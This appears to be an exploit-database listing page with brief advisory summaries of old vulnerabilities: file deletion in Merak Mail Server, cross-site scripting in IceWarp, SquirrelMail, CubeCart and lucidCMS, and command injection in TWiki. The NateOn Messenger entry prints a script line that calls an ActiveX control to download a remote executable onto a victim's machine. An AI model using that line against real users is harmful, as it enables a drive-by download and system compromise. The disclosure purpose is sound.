header-logo
Suggest Exploit
explore-vulnerabilities

Explore Vulnerabilities

Version
Year

Explore all Exploits:

Merak Mail Server Arbitrary File Deletion Vulnerability

Merak Mail Server is affected by an arbitrary file deletion vulnerability. This issue arises due to an input validation error allowing an attacker to delete files in the context of the Web server running the application. An attacker can exploit this issue to cause a denial of service condition due to data corruption.

IceWarp Cross-Site Scripting Vulnerabilities

IceWarp is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. An attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. These may facilitate the theft of cookie-based authentication credentials as well as other attacks.

NateOn Messenger Arbitrary File Download and Buffer Overflow Vulnerabilities

NateOn Messenger is susceptible to an arbitrary file download vulnerability, and a buffer overflow vulnerability. These issues are present in the 'NateonDownloadManager.ocx' ActiveX control that is installed with the application. An attacker would exploit these issues by creating malicious HTML containing script code that accesses the vulnerable ActiveX controls. This issue allows remote attackers to fetch arbitrary remote files and save them on the local machine. The buffer overflow vulnerability allows remote attackers to execute arbitrary machine code in the context of the user running the affected software, facilitating remote system compromise. Attackers may utilize these vulnerabilities in conjunction with each other in order to transfer malicious code to targeted users, and then execute it. To exploit the arbitrary file download vulnerability, a malicious Web page may include the following script code: GotNate.Excute('1','http://www.example.com/somefile.exe','c:windowssystem32cmd.exe');

SquirrelMail Address Add Plugin Cross-Site Scripting Vulnerability

SquirrelMail Address Add Plugin is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

CubeCart Multiple Cross-Site Scripting Vulnerabilities

CubeCart is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. An attacker may leverage any of these issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks.

CubeCart Cross-Site Scripting Vulnerabilities

CubeCart is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. An attacker may leverage any of these issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks.

lucidCMS Cross-Site Scripting Vulnerability

lucidCMS is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks.

Remote Command Execution Vulnerability in TWikiUsers Script

The revision control function of the TWikiUsers script uses the backtick shell metacharacter to construct a command line. An attacker may use a specially crafted URI to execute arbitrary commands through the shell. This attack would occur in the context of the vulnerable application and can facilitate unauthorized remote access.

Recent Exploits: